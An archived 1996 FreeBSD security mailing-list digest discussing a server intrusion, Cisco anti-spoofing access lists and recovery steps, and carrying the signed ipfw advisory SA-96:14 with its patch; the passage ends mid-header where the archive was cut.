TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, Jordan K. Hubbard wrote: > > Do you have anti-spoof filter rules in your backbone router? If not > > install them. If so, please add packets coming in from localhost > > How do you install such things on a cisco 2500? :-) Seriously, if > there's a way then I can get someone from cisco to help me out, but I > first need to know that it's even a reasonable request. Very simply, considering what most people refer to as anti-spoof filters are filters that make sure internal addresses aren't coming in on an external interface. On our 2500, the very first incoming rule on the serial port that goes to our T1 is "deny anything that has a source address within our class C address." Now I get to add 127.0.0.0 :-) This way, if we see an address on the internal networks that has our Class C address (or our 192.168.X.X addresses), we know it was generated internally, so if it is a hack attempt, we've already been breeched. If there are better anti-spoofing filters, I'm not aware of them, and will gladly listen. If you need any more help than the explanation (If you know Cisco filtering rules, the rest is simple), feel free to email me. From owner-freebsd-security Mon Jun 24 06:53:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id GAA21846 for security-outgoing; Mon, 24 Jun 1996 06:53:03 -0700 (PDT) Received: from brasil.moneng.mei.com (brasil.moneng.mei.com [151.186.109.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA21840; Mon, 24 Jun 1996 06:52:58 -0700 (PDT) Received: (from jgreco@localhost) by brasil.moneng.mei.com (8.7.Beta.1/8.7.Beta.1) id IAA05446; Mon, 24 Jun 1996 08:51:40 -0500 From: Joe Greco Message-Id: <199606241351.IAA05446@brasil.moneng.mei.com> Subject: Re: I need help on this one - please help me track this guy down! To: guido@gvr.win.tue.nl (Guido van Rooij) Date: Mon, 24 Jun 1996 08:51:39 -0500 (CDT) Cc: jkh@time.cdrom.com, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG In-Reply-To: <199606240822.KAA12148@gvr.win.tue.nl> from "Guido van Rooij" at Jun 24, 96 10:22:12 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > How do you install such things on a cisco 2500? :-) Seriously, if > > there's a way then I can get someone from cisco to help me out, but I > > first need to know that it's even a reasonable request. > > Put an access group *in*. On the interface to your ISP. Deny all > packets originating from ip numbers on your internal network. > Allow anything else. Better yet, do not allow just "anything" else... I block the RFC1597 "private internets" and 127.0.0.0/8 and 0.0.0.0/8 on both inbound and outbound filters, in addition to blocking inbound addresses with my network numbers.. basically they don't survive my routers :-) I don't have a Cisco manual handy, I do remember that the syntax is a bit grungy, but very flexible. Note: IIRC, the CPU on a 2500 is about as fast as a VW bug. You might be better off getting a PC, running FreeBSD, and doing a firewall on that ;-) You could even dump the 2500 in favor of one of ET's sync serial cards. ... Joe ------------------------------------------------------------------------------- Joe Greco - Systems Administrator jgreco@ns.sol.net Solaria Public Access UNIX - Milwaukee, WI 414/546-7968 From owner-freebsd-security Mon Jun 24 07:19:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA23623 for security-outgoing; Mon, 24 Jun 1996 07:19:48 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA23611; Mon, 24 Jun 1996 07:19:37 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id QAA12781; Mon, 24 Jun 1996 16:17:58 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606241417.QAA12781@gvr.win.tue.nl> Subject: Re: I need help on this one - please help me track this guy down! To: jgreco@brasil.moneng.mei.com (Joe Greco) Date: Mon, 24 Jun 1996 16:17:57 +0200 (MET DST) Cc: jkh@time.cdrom.com, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG In-Reply-To: <199606241351.IAA05446@brasil.moneng.mei.com> from Joe Greco at "Jun 24, 96 08:51:39 am" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Joe Greco wrote: > > > How do you install such things on a cisco 2500? :-) Seriously, if > > > there's a way then I can get someone from cisco to help me out, but I > > > first need to know that it's even a reasonable request. > > > > Put an access group *in*. On the interface to your ISP. Deny all > > packets originating from ip numbers on your internal network. > > Allow anything else. > > Better yet, do not allow just "anything" else... > > I block the RFC1597 "private internets" and 127.0.0.0/8 and 0.0.0.0/8 on > both inbound and outbound filters, in addition to blocking inbound addresses > with my network numbers.. basically they don't survive my routers :-) > We do too..but for the sake of simplicity I didn't mention the RFC1597 addresses. The 0.0.0.0/8 is new to me..what is its purpose? -Guido From owner-freebsd-security Mon Jun 24 07:29:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA24582 for security-outgoing; Mon, 24 Jun 1996 07:29:21 -0700 (PDT) Received: from brasil.moneng.mei.com (brasil.moneng.mei.com [151.186.109.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA24574; Mon, 24 Jun 1996 07:29:16 -0700 (PDT) Received: (from jgreco@localhost) by brasil.moneng.mei.com (8.7.Beta.1/8.7.Beta.1) id JAA05533; Mon, 24 Jun 1996 09:28:02 -0500 From: Joe Greco Message-Id: <199606241428.JAA05533@brasil.moneng.mei.com> Subject: Re: I need help on this one - please help me track this guy down! To: guido@gvr.win.tue.nl (Guido van Rooij) Date: Mon, 24 Jun 1996 09:28:01 -0500 (CDT) Cc: jgreco@brasil.moneng.mei.com, jkh@time.cdrom.com, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG In-Reply-To: <199606241417.QAA12781@gvr.win.tue.nl> from "Guido van Rooij" at Jun 24, 96 04:17:57 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > Better yet, do not allow just "anything" else... > > > > I block the RFC1597 "private internets" and 127.0.0.0/8 and 0.0.0.0/8 on > > both inbound and outbound filters, in addition to blocking inbound addresses > > with my network numbers.. basically they don't survive my routers :-) > > > > We do too..but for the sake of simplicity I didn't mention the RFC1597 > addresses. The 0.0.0.0/8 is new to me..what is its purpose? It's a reserved, unassigned network. I don't have an RFC handy to check, but I believe that the reasoning might have been because of the "magic" "address" 0.0.0.0 that it contains. It seems simpler to lose it than to be in doubt, and I think I saw a detailed argument at one point, anyways... ;-) ... Joe ------------------------------------------------------------------------------- Joe Greco - Systems Administrator jgreco@ns.sol.net Solaria Public Access UNIX - Milwaukee, WI 414/546-7968 From owner-freebsd-security Mon Jun 24 07:58:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA27350 for security-outgoing; Mon, 24 Jun 1996 07:58:55 -0700 (PDT) Received: from parkplace.cet.co.jp (parkplace.cet.co.jp [202.32.64.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA27324; Mon, 24 Jun 1996 07:58:49 -0700 (PDT) Received: from localhost (michaelh@localhost) by parkplace.cet.co.jp (8.7.5/CET-v2.1) with SMTP id XAA07216; Mon, 24 Jun 1996 23:58:11 +0900 (JST) Date: Mon, 24 Jun 1996 23:58:10 +0900 (JST) From: Michael Hancock To: Ollivier Robert cc: "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606241143.NAA09908@keltia.freenix.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Maybe someone should ask pu.ru to filter outgoing non-pu.ru packets. Some ISPs do this. On Mon, 24 Jun 1996, Ollivier Robert wrote: > It seems that Jordan K. Hubbard said: > > How do you install such things on a cisco 2500? :-) Seriously, if > > there's a way then I can get someone from cisco to help me out, but I > > first need to know that it's even a reasonable request. > > If you use Serial0 for the Internet and A.B.C.0/24 in your internal > network, use something like the following: > > ! > ! Refuses loose/strict source routed packets > ! > no ip source-route > ! > interface Serial0 > ip address A.B.C.254 255.255.255.0 > ip access-g 100 in > ip access-g 101 out > > ... > > ! access list for incoming packets > ! should fix most of the new attacks when a spoofed packet > ! is trying to come from the outside with a source address > ! from our network which is impossible. > ! > no access-list 100 > ! > ! Rejects our own addresses C-Class A.B.C.0/24 > ! > access-list 100 deny ip A.B.C.0 0.0.0.255 any > ! > ! Rejects EPITA B-Class 163.5.0.0/16 > ! > access-list 100 deny ip 163.5.0.0 0.0.255.255 any > ! > ! Rejects special addresses > ! > access-list 100 deny ip 127.0.0.0 0.255.255.255 any > ! > ! RFC-1918 IANA reserved A/B/C classes > ! A-Class 10.0.0.0/8 > ! > access-list 100 deny ip 10.0.0.0 0.255.255.255 any > ! > ! B-Classes 172.16.0.0/12 > ! > access-list 100 deny ip 172.16.0.0 0.15.255.255 any > ! > ! C-Classes 192.168.0.0/16 > ! > access-list 100 deny ip 192.168.0.0 0.0.255.255 any > ! > ! Accepts the rest > ! > access-list 100 permit ip any A.B.C.0 0.0.0.255 > > -- > Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr > FreeBSD keltia.freenix.fr 2.2-CURRENT #11: Thu Jun 13 11:01:47 MET DST 1996 > From owner-freebsd-security Mon Jun 24 09:02:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA02283 for security-outgoing; Mon, 24 Jun 1996 09:02:56 -0700 (PDT) Received: (from guido@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA02256; Mon, 24 Jun 1996 09:02:51 -0700 (PDT) Message-Id: <199606241602.JAA02256@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: guido set sender to security-officer@freebsd.org using -f To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org Cc: freebsd-security@freebsd.org, first-teams@first.org From: FreeBSD Security Officer Reply-To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:14.ipfw Date: Mon, 24 Jun 1996 09:00:00 -0700 (PDT) Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:14 Security Advisory FreeBSD, Inc. Topic: Firewall filter leak with user level ipfw Category: core Module: ipfw Announced: 1996-06-24 Affects: FreeBSD -current Feb 24 1996 and later (ipfw.c rev 1.20) FreeBSD -stable Feb 26 1996 and later (ipfw.c rev 1.15.4.2) Corrected: Both FreeBSD -current and -stable as of Jun 23 1996 FreeBSD only: yes Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:14/ ============================================================================= I. Background FreeBSD is shipped with packet filtering code. This is implemented by kernel level modules and user level programs. The user level program ipfw, used to control the packet filtering code in the kernel, has a bug in the way packet filter rules are interpreted. II. Problem Description A potential problem exists when users specify mask addresses to ipfw(8) using the address:mask syntax. Specifically, whenever the ':' syntax is used, the resulting mask is always 0xffffffff. III. Impact Whenever the address:mask syntax is used, the actual packet filtering will differ from the expected filtering thus allowing or denying more packets through the filter than intended. IV. Workaround There is a simple workaround for this problem: Do not use the address:mask syntax. In stead, use the address/mask syntax. The implementation of the latter way of specifying masks does not suffer from the mentioned bug. V. Solution Apply one of the patches below, depending on your version of FreeBSD. The patch is against /usr/src/sbin/ipfw/ipfw.c The following patch applies to -stable: Index: ipfw.c =================================================================== RCS file: /home/ncvs/src/sbin/ipfw/ipfw.c,v retrieving revision 1.15.4.4 retrieving revision 1.15.4.5 diff -u -r1.15.4.4 -r1.15.4.5 - --- ipfw.c 1996/06/18 02:03:29 1.15.4.4 +++ ipfw.c 1996/06/23 20:51:37 1.15.4.5 @@ -15,7 +15,7 @@ * * NEW command line interface for IP firewall facility * - - * $Id: ipfw.c,v 1.15.4.4 1996/06/18 02:03:29 alex Exp $ + * $Id: ipfw.c,v 1.15.4.5 1996/06/23 20:51:37 alex Exp $ * */ @@ -200,7 +200,7 @@ } if (chain->fw_flg & IP_FW_F_FRAG) - - printf("frag "); + printf(" frag "); if (chain->fw_ipopt || chain->fw_ipnopt) { int _opt_printed = 0; @@ -321,12 +321,22 @@ if (!inet_aton(*av,ipno)) show_usage("ip number\n"); - - if (md == ':' && !inet_aton(p,mask)) - - show_usage("ip number\n"); - - else if (md == '/') - - mask->s_addr = htonl(0xffffffff << (32 - atoi(p))); - - else - - mask->s_addr = htonl(0xffffffff); + switch (md) { + case ':': + if (!inet_aton(p,mask)) + show_usage("ip number\n"); + break; + case '/': + if (atoi(p) == 0) { + mask->s_addr = 0; + } else { + mask->s_addr = htonl(0xffffffff << (32 - atoi(p))); + } + break; + default: + mask->s_addr = htonl(0xffffffff); + break; + } av++; ac--; } @@ -611,10 +621,9 @@ break; case 'N': do_resolv=1; - - break; - - case '?': - - default: - - show_usage(NULL); + break; + default: + show_usage(NULL); } ac -= optind; @@ -645,7 +654,7 @@ } else { show_usage(NULL); } - - return 0; + return 0; } int This one applies to -current: Index: ipfw.c =================================================================== RCS file: /home/ncvs/src/sbin/ipfw/ipfw.c,v retrieving revision 1.26 retrieving revision 1.27 diff -u -r1.26 -r1.27 - --- ipfw.c 1996/06/18 01:46:34 1.26 +++ ipfw.c 1996/06/23 20:47:51 1.27 @@ -16,7 +16,7 @@ * * NEW command line interface for IP firewall facility * - - * $Id: ipfw.c,v 1.26 1996/06/18 01:46:34 alex Exp $ + * $Id: ipfw.c,v 1.27 1996/06/23 20:47:51 alex Exp $ * */ @@ -256,7 +256,7 @@ } if (chain->fw_flg & IP_FW_F_FRAG) - - printf("frag "); + printf(" frag "); if (chain->fw_ipopt || chain->fw_ipnopt) { int _opt_printed = 0; @@ -408,12 +408,23 @@ if (lookup_host(*av,ipno) != 0) show_usage("ip number\n"); - - if (md == ':' && !inet_aton(p,mask)) - - show_usage("ip number\n"); - - else if (md == '/') - - mask->s_addr = htonl(0xffffffff << (32 - atoi(p))); - - else - - mask->s_addr = htonl(0xffffffff); + switch (md) { + case ':': + if (!inet_aton(p,mask)) + show_usage("ip number\n"); + break; + case '/': + if (atoi(p) == 0) { + mask->s_addr = 0; + } else { + mask->s_addr = htonl(0xffffffff << (32 - atoi(p))); + } + break; + default: + mask->s_addr = htonl(0xffffffff); + break; + } + ipno->s_addr &= mask->s_addr; av++; ac--; } @@ -788,10 +799,9 @@ break; case 'N': do_resolv=1; - - break; - - case '?': - - default: - - show_usage("Unrecognised switch"); + break; + default: + show_usage("Unrecognised switch"); } ac -= optind; @@ -818,7 +828,7 @@ } else { show_usage("Bad arguments"); } - - return 0; + return 0; } int ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBMc22kFUuHi5z0oilAQEOBwP/WCVQZdHqv3ITppwCee3qNbe49nbNM4gc +s3DX4qMe4olAvpd2izhNzPJH3mrOXzKKJTrZOeouZFDUm099lS67xQnc7F343v8 iAJMtIZVlA58BmcQcSlmjqh9eqTgNyRIYpgYoefDKkgKE6eukWylariorUo+ppKe Tnpol2BUTXo= =Ut0+ -----END PGP SIGNATURE----- From owner-freebsd-security Mon Jun 24 09:04:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA02384 for security-outgoing; Mon, 24 Jun 1996 09:04:35 -0700 (PDT) Received: from critter.tfs.com ([140.145.16.108]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA02376; Mon, 24 Jun 1996 09:04:33 -0700 (PDT) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id IAA06632; Mon, 24 Jun 1996 08:28:27 -0700 (PDT) To: "Jordan K. Hubbard" cc: Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Sun, 23 Jun 1996 18:40:25 PDT." <8378.835580425@time.cdrom.com> Date: Mon, 24 Jun 1996 08:28:26 -0700 Message-ID: <6630.835630106@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk In message <8378.835580425@time.cdrom.com>, "Jordan K. Hubbard" writes: >Also, I think that calling the FBI on this one is only likely to get >me put on infinite hold when they hear that the perpetrator is in >Russia. :-) Yes, Russia would be an CIA issue. -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Jun 24 10:04:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA05776 for security-outgoing; Mon, 24 Jun 1996 10:04:39 -0700 (PDT) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA05767; Mon, 24 Jun 1996 10:04:37 -0700 (PDT) Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by who.cdrom.com (8.6.12/8.6.11) with ESMTP id KAA09983 ; Mon, 24 Jun 1996 10:04:32 -0700 Received: (from narvi@localhost) by haldjas.folklore.ee (8.6.12/8.6.12) id UAA26632; Mon, 24 Jun 1996 20:05:05 +0300 Date: Mon, 24 Jun 1996 20:05:05 +0300 (EET DST) From: Narvi To: Terry Lambert cc: "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606240651.XAA27306@phaeton.artisoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, Terry Lambert wrote: > > Hmmm. We have reason to believe that he *didn't* get root (though > > we're still assuming he did, just to be paranoid) and if the mod times > > can be trusted, hosts.equiv hasn't been touched in many months (and > > localhost is commented out). > > 1) Do not believe this. Assume he got root. > 2) Assume your password changes are mailed out as cleartext by > your passwd program. > 3) Assumed md5 and checksum have been hacked to lie about > themselves and any other files affected. > 4) Assume system time stamps were changed. > 5) Assume all log files were edited. > 6) Best approach: reinstall the system (from distribution, > not backup --- no telling how long he was there). > 7) Turn off the stupid "password must meet these criteria" > on the password change. All it does is reduce the search > space a hacker needs to apply. > 8) Put spoofing filters on your firewall; basically, look for > the response bit. > 9) Make sure you aren't running routed -q. > 10) Turn of source routing on your gateway, if it's on. Now are there some more things someone who's system was breaked into could look for? Perhaps some passwords should be switched to S/Key - it should be possible to generate them on a remote machine and then install? > > If you need help getting the FBI involved, tell them you had "munitions" > on the machine. ;-). The "secure" part of distribution + DES actually are so by the definition, no matter that he could have downloaded them from much nearer... Sander who is by no means a security specialist > > > Terry Lambert > terry@lambert.org > --- > Any opinions in this posting are my own and not those of my present > or previous employers. > From owner-freebsd-security Mon Jun 24 10:08:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA06312 for security-outgoing; Mon, 24 Jun 1996 10:08:03 -0700 (PDT) Received: from critter.tfs.com ([140.145.16.108]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA06287; Mon, 24 Jun 1996 10:08:01 -0700 (PDT) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id KAA07506; Mon, 24 Jun 1996 10:07:30 -0700 (PDT) To: nash@mcs.com cc: nate@sri.MT.net, freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org Subject: Re: IPFW documentation In-reply-to: Your message of "Sun, 23 Jun 1996 17:31:22 CDT." <199606232231.RAA00403@zen.nash.org> Date: Mon, 24 Jun 1996 10:07:28 -0700 Message-ID: <7504.835636048@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk In message <199606232231.RAA00403@zen.nash.org>, Alex Nash writes: >> I hope we get reviewers, but if you don't I'd still bring it into >> -stable since you've given 'fair notice'. > >That's two votes for, none against :) I don't think that there are any votes against as such. What I told (tried to tell) Alex was, "unless you're VERY sure it works, don't touch -stable". I guess the mask-bug with my name on it underlines this statement :-( I don't have a testing environment here, much less a development one, so I'm pretty unable to help, sorry! -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Jun 24 10:25:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA08350 for security-outgoing; Mon, 24 Jun 1996 10:25:17 -0700 (PDT) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA08343; Mon, 24 Jun 1996 10:25:14 -0700 (PDT) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id KAA28491; Mon, 24 Jun 1996 10:19:22 -0700 From: Terry Lambert Message-Id: <199606241719.KAA28491@phaeton.artisoft.com> Subject: Re: I need help on this one - please help me track this guy down! To: narvi@haldjas.folklore.ee (Narvi) Date: Mon, 24 Jun 1996 10:19:22 -0700 (MST) Cc: terry@lambert.org, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG In-Reply-To: from "Narvi" at Jun 24, 96 08:05:05 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Now are there some more things someone who's system was breaked into > could look for? Perhaps some passwords should be switched to S/Key - > it should be possible to generate them on a remote machine and then > install? SUID/SGID programs. Permission changes on devices. Compiler changes. Changes to ld.so. Kernel modules that weren't there before. RC file changes. The list is endless, which is why you reinstall. You can trust every binary from the distribution media. When the 414's broke into a machine I was administering, it got reinstalled, period. Using security logs (which you have to have in place before the fact), we were able to trace back to the original MAC address ... to a specific machine in a specific lab on a college campus, with the cooperation of the terminal server there. The same loose security that let him hack from there let us locate him. Within 8 hours, the system was fully firewalled and back on line (with all attempt logging active). The most stupid thing I have ever seen someone do was asserting "we're smarter than them; we're going to let them come in, and we'll catch them red handed". Then they decided to establish a secure zone and expand it, instead of cutting off the net access and establishing a switchable zone. This rendered the computers of a large number of engineers useless for a relatively long period of time... the net effect was about $1.2M in costs for idle engineering time plus facility costs. If you have a problem system, dike it out of your network. If you have a problem terminal server, take it off line and fix it. If you have a problem office, deny it access to the corporate net until the problem is resolved. A couple of plane tickets and some hotel bills to get your experts on site is a hell of a lot less expensive and more effective than trying to run an uncooperative hacker by wire in an ill-thought attempt to demonstrate your own brilliance. Further discussion should probably go to "chat" or "security". Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Mon Jun 24 10:37:19 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA10302 for security-outgoing; Mon, 24 Jun 1996 10:37:19 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA10284; Mon, 24 Jun 1996 10:37:12 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id TAA16762; Mon, 24 Jun 1996 19:34:08 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606241734.TAA16762@gvr.win.tue.nl> Subject: Re: I need help on this one - please help me track this guy down! To: narvi@haldjas.folklore.ee (Narvi) Date: Mon, 24 Jun 1996 19:34:07 +0200 (MET DST) Cc: terry@lambert.org, jkh@time.cdrom.com, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org In-Reply-To: from Narvi at "Jun 24, 96 08:05:05 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > Now are there some more things someone who's system was breaked into > could look for? Perhaps some passwords should be switched to S/Key - > it should be possible to generate them on a remote machine and then > install? > Another good idea is to start using the /etc/login.access file. For me, all logins will orginate from a small set of machines... -Guido From owner-freebsd-security Mon Jun 24 10:44:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA11370 for security-outgoing; Mon, 24 Jun 1996 10:44:03 -0700 (PDT) Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA11249; Mon, 24 Jun 1996 10:43:36 -0700 (PDT) Received: (from narvi@localhost) by haldjas.folklore.ee (8.6.12/8.6.12) id UAA26882; Mon, 24 Jun 1996 20:48:19 +0300 Date: Mon, 24 Jun 1996 20:48:18 +0300 (EET DST) From: Narvi To: jaeger cc: "Jordan K. Hubbard" , Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 23 Jun 1996, jaeger wrote: > > > On Sun, 23 Jun 1996, Jordan K. Hubbard wrote: > > > All we have are the "last" logs, which show: > > > > jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28) > > jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33) > > > > If someone at the russian site could help correlate this time (PST) to > > the local time at wherever a235.ru.pu came in from, we could at least > > narrow down which user(s) it might have been. > > > This appears to be a Dialup IP connection. If the machine logging > the terminal server (or other dialip access device) wasn't root compromised, > we should see some useful logs. Probably a stolen account. > Because of the presence of the lastlog records and the generally > good security of FreeBSD, I also suspect there was no root compromise on > wcarchive. I'm concerned about the possibility of a DNS server compromise, > given the unusual traceroute results of the intruder's IP. > On another pessimistic note, I believe most of the telco switches in > Russia are still crossbars, which could make any attempt to trace the > intruder through the phone system fruitless. :< You may be in a mistake on that one... The phone calls in the former Soviet Union used to be traceable :-( So it could be possible to find it out if measures are taken urgently - and I think it has to be the owner of the dial up connection - provided there aren't hundreds of calls per day. Sander > > > > Jordan > > > -jaeger > From owner-freebsd-security Mon Jun 24 10:44:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA11533 for security-outgoing; Mon, 24 Jun 1996 10:44:32 -0700 (PDT) Received: from brasil.moneng.mei.com (brasil.moneng.mei.com [151.186.109.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA11409; Mon, 24 Jun 1996 10:44:13 -0700 (PDT) Received: (from jgreco@localhost) by brasil.moneng.mei.com (8.7.Beta.1/8.7.Beta.1) id MAA05936; Mon, 24 Jun 1996 12:43:33 -0500 From: Joe Greco Message-Id: <199606241743.MAA05936@brasil.moneng.mei.com> Subject: Re: I need help on this one - please help me track this guy down! To: michaelh@cet.co.jp (Michael Hancock) Date: Mon, 24 Jun 1996 12:43:33 -0500 (CDT) Cc: security@freebsd.org, hackers@freebsd.org, isp@freebsd.org In-Reply-To: from "Michael Hancock" at Jun 24, 96 11:58:10 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Maybe someone should ask pu.ru to filter outgoing non-pu.ru packets. Some > ISPs do this. Any ISP that doesn't is (IMNSHO) screaming their incompetence. ... Joe ------------------------------------------------------------------------------- Joe Greco - Systems Administrator jgreco@ns.sol.net Solaria Public Access UNIX - Milwaukee, WI 414/546-7968 From owner-freebsd-security Mon Jun 24 12:21:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA23956 for security-outgoing; Mon, 24 Jun 1996 12:21:28 -0700 (PDT) Received: from linux4nn.gn.iaf.nl (root@linux4nn.gn.iaf.nl [193.67.144.34]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA23924; Mon, 24 Jun 1996 12:21:08 -0700 (PDT) Received: from uni4nn.iaf.nl (root@uni4nn.iaf.nl [193.67.144.33]) by linux4nn.gn.iaf.nl (8.6.9/8.6.9) with SMTP id VAA21509; Mon, 24 Jun 1996 21:19:58 +0200 Received: by uni4nn.iaf.nl with UUCP id AA08962 (5.67b/IDA-1.5); Mon, 24 Jun 1996 21:19:37 +0200 Received: by iafnl.es.iaf.nl with UUCP id AA15588 (5.67b/IDA-1.5); Mon, 24 Jun 1996 20:42:36 +0200 Received: (from wilko@localhost) by yedi.iaf.nl (8.6.12/8.6.6) id UAA01054; Mon, 24 Jun 1996 